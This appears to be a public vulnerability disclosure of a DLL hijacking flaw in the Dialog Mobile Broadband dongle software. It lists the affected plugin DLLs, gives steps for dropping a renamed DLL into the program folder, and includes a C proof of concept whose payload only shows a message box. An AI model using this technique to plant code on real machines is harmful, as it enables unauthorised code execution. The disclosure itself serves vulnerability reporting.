Vulnerable software ..........................  Dialog Mobile Broadband 23.015.11.01.297

Vulnerability type .............................. DLL hijacking vulnerability

Affected DLL's....................................  CallSrvPlugin.dll , GpsSrvPlugin.dll , CallAppPlugin.dll , CallLogSrvPlugin.dll , WLANPlugin.dll , CallAppPlugin,MDInterface.dll

Vendor url .https://www.dialog.lk

Author..Himash



Product descriptionDialog mobile broad band is a dongle software (3g modem)for accessing internet.

                                                                  It comes with dialog dongle pre installed.







1. Compile dynamic link library (DLL)

2. Rename to CallSrvPlugin.dll

2. Copy CallSrvPlugin to  "C:\Program Files (x86)\Dialog Mobile Broadband"

3. Launch Dialog Mobile Broadband

4. MessageBox executes that verifies the dll hijacking is successful.



Proof of concept Exploit





#include <windows.h>



int dll_hijack()

{

MessageBox(0, "found DLL hijacking vulnerability in dialog mobile broadband by himash", "DLL Message", MB_OK);

return 0;

}



BOOL WINAPI DllMain (

HANDLE hinstDLL,

DWORD fdwReason,

LPVOID lpvReserved)

{



dll_hijack();



return 0;

}